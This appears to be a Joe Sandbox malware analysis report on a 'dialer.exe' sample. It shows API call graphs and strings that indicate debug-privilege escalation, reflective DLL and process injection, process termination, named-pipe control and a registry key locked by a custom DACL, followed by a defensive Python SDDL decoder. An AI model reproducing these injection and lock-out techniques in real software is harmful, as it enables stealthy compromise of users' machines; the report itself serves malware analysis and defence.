                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:59
                                                      Start time:17:09:28
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:60
                                                      Start time:17:09:28
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1844125143.00007FF74AA01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF74AA00000, based on PE: true
                                                        • Associated: 00000000.00000002.1844098310.00007FF74AA00000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1844145785.00007FF74AA0B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1844164705.00007FF74AA0F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1844274241.00007FF74AA10000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1844901576.00007FF74AF08000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1844935342.00007FF74AF40000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1844951110.00007FF74AF43000.00000002.00000001.01000000.00000003.sdmp

                                                        Execution Graph

                                                        Execution Coverage:46.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:67%
                                                        Total number of Nodes:227
                                                        Total number of Limit Nodes:23

                                                        Callgraph

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                        Control-flow Graph

                                                         Basic blocks (id: address range, API calls / subcalls; -> successors):
                                                         • 128: 1400021d0-1400021da -> 129
                                                         • 129: 1400021dd-1400021f0, call 140001b54 -> 132, 133
                                                         • 132: 1400021f2-1400021fb, Sleep -> 129
                                                         • 133: 1400021fd-14000220a, ConnectNamedPipe -> 134, 135
                                                         • 134: 140002241-140002246, Sleep -> 136
                                                         • 135: 14000220c-14000222d, ReadFile -> 136, 137
                                                         • 136: 14000224c-140002255, DisconnectNamedPipe -> 133
                                                         • 137: 14000222f-140002234 -> 136, 138
                                                         • 138: 140002236-14000223f -> 136
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                        Control-flow Graph

                                                         Basic blocks (id: address range, API calls / subcalls; -> successors):
                                                         • 148: 140002b38-140002b8c, GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc -> 149
                                                         • 149: 140002b8e-140002ba1, K32EnumProcesses -> 150, 151
                                                         • 150: 140002ba3-140002bb2 -> 152, 153
                                                         • 151: 140002beb-140002bf4, Sleep -> 149
                                                         • 152: 140002bb4-140002bb8 -> 154, 155
                                                         • 153: 140002bdc-140002be7 -> 151
                                                         • 154: 140002bba -> 156
                                                         • 155: 140002bcb-140002bce, call 140002540 -> 159
                                                         • 156: 140002bbe-140002bc3 -> 157, 158
                                                         • 157: 140002bc5-140002bc9 -> 155, 156
                                                         • 158: 140002bd6-140002bda -> 152, 153
                                                         • 159: 140002bd2 -> 158
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                        Control-flow Graph

                                                         Basic blocks (id: address range, API calls; -> successors):
                                                         • 172: 1400018ac-1400018d6, OpenProcess -> 173, 174
                                                         • 173: 140001901-140001912 (no successors listed)
                                                         • 174: 1400018d8-1400018e8, IsWow64Process -> 175, 176
                                                         • 175: 1400018f8-1400018fb, CloseHandle -> 173
                                                         • 176: 1400018ea-1400018f3 -> 175
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                        Control-flow Graph

                                                         Basic blocks (id: address range, API calls / subcalls; -> successors):
                                                         • 177: 140002258-14000225c, call 14000226c -> 179
                                                         • 179: 140002261-140002263, ExitProcess (no successors listed)
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716
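
The subcall at 000000014000226C creates a registry key with RegCreateKeyExW, turns a string into a security descriptor with ConvertStringSecurityDescriptorToSecurityDescriptorW and applies it with RegSetKeySecurity; that is the SDDL route for giving a key a DACL of the sample's choosing. The report does not print the string, so whoever recovers it from the binary has to read raw SDDL. The following is an added example written for this page, not code from the Joe Sandbox report or from the sample: a decoder for the DACL component of an SDDL string plus a check for settings that keep administrators and security tools out of a key. SAMPLE_SDDL and BENIGN_SDDL are constructed for illustration and are not strings taken from the sample.

```python
"""Decode the D: (DACL) component of an SDDL string and flag lock-out settings."""
import re

ACE_TYPE = {"A": "ALLOW", "D": "DENY", "AU": "AUDIT"}
ACE_FLAG = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
            "IO": "INHERIT_ONLY", "ID": "INHERITED"}
# Two-letter codes are resolved by field position: "WD" in the rights field is WRITE_DAC,
# "WD" in the trustee field is the Everyone SID.
RIGHT = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
         "GX": "GENERIC_EXECUTE", "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ",
         "KW": "KEY_WRITE", "KX": "KEY_EXECUTE", "SD": "DELETE", "RC": "READ_CONTROL",
         "WD": "WRITE_DAC", "WO": "WRITE_OWNER"}
SID = {"SY": "S-1-5-18 (LOCAL SYSTEM)", "BA": "S-1-5-32-544 (Administrators)",
       "BU": "S-1-5-32-545 (Users)", "WD": "S-1-1-0 (Everyone)",
       "AU": "S-1-5-11 (Authenticated Users)"}
DACL_FLAG = {"P": "PROTECTED", "AI": "AUTO_INHERITED", "AR": "AUTO_INHERIT_REQ"}
# Trustees that defenders (admins, AV running as a normal principal) usually act as.
DEFENDER_SIDS = {SID["BA"], SID["WD"], SID["AU"], SID["BU"]}


def _pairs(s):
    """Split a run of two-letter SDDL codes such as 'CIOI' into ['CI', 'OI']."""
    return re.findall(r"..", s)


def parse_ace(ace):
    """'(type;flags;rights;object_guid;inherit_guid;trustee)' -> dict of decoded fields."""
    f = ace.strip("()").split(";")
    rights = [f[2]] if f[2].startswith("0x") else [RIGHT.get(x, x) for x in _pairs(f[2])]
    return {"type": ACE_TYPE.get(f[0], f[0]),
            "flags": [ACE_FLAG.get(x, x) for x in _pairs(f[1])],
            "rights": rights,
            "trustee": SID.get(f[5], f[5])}   # unknown trustees stay as literal SIDs


def parse_dacl(sddl):
    """Return (dacl_flags, aces) for the D: component; ([], []) if there is none."""
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        return [], []
    flags = [DACL_FLAG[x] for x in re.findall(r"AI|AR|P", m.group(1))]
    return flags, [parse_ace(a) for a in re.findall(r"\([^)]*\)", m.group(2))]


def lockout_findings(sddl):
    """Reasons this DACL would keep administrators or security tools out of the key."""
    flags, aces = parse_dacl(sddl)
    findings = []
    if "PROTECTED" in flags:
        findings.append("protected DACL: ACEs inherited from the parent key are cut off")
    for a in aces:
        if a["type"] == "DENY" and a["trustee"] in DEFENDER_SIDS:
            findings.append(f"DENY {'|'.join(a['rights'])} to {a['trustee']}")
    allowed = {a["trustee"] for a in aces if a["type"] == "ALLOW"}
    if allowed and allowed <= {SID["SY"]}:
        findings.append("only LOCAL SYSTEM is granted any access")
    return findings


# Constructed inputs for illustration; neither string is taken from the sample.
SAMPLE_SDDL = "D:P(D;;KA;;;BA)(D;;KR;;;WD)(A;;KA;;;SY)"
BENIGN_SDDL = "O:BAG:SYD:(A;CI;KR;;;BU)(A;CI;KA;;;BA)(A;CI;KA;;;SY)"

if __name__ == "__main__":
    for label, s in (("sample", SAMPLE_SDDL), ("benign", BENIGN_SDDL)):
        print(label, lockout_findings(s) or ["no lock-out settings"])
```

A key with a protected DACL that denies Administrators and Everyone while allowing only SYSTEM cannot be read or deleted by an elevated analyst shell until ownership is retaken, which is the practical reason to decode the string before trying to clean the key.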

                                                        Control-flow Graph

                                                         Raw export (block id, address range, API calls and subcalls, edges as from->to):
                                                         control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                        • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                        Control-flow Graph

                                                         Basic blocks (id: address range, API calls; -> successors):
                                                         • 280: 140001c88-140001cb8 -> 281
                                                         • 281: 140001cbb-140001cc8 -> 282, 283
                                                         • 282: 140001e8c-140001e91 -> 281, 286
                                                         • 283: 140001cce-140001d25, CreateProcessW -> 284, 285
                                                         • 284: 140001e88 -> 282
                                                         • 285: 140001d2b-140001d5a, VirtualAllocEx -> 287, 288
                                                         • 286: 140001e97 -> 289
                                                         • 287: 140001e5d-140001e60 -> 290, 291
                                                         • 288: 140001d60-140001d7b, WriteProcessMemory -> 287, 292
                                                         • 289: 140001e99-140001eb9 (no successors listed)
                                                         • 290: 140001e62-140001e76, OpenProcess -> 284, 293
                                                         • 291: 140001e85 -> 284
                                                         • 292: 140001d81-140001d87 -> 294, 295
                                                         • 293: 140001e78-140001e83, TerminateProcess -> 284
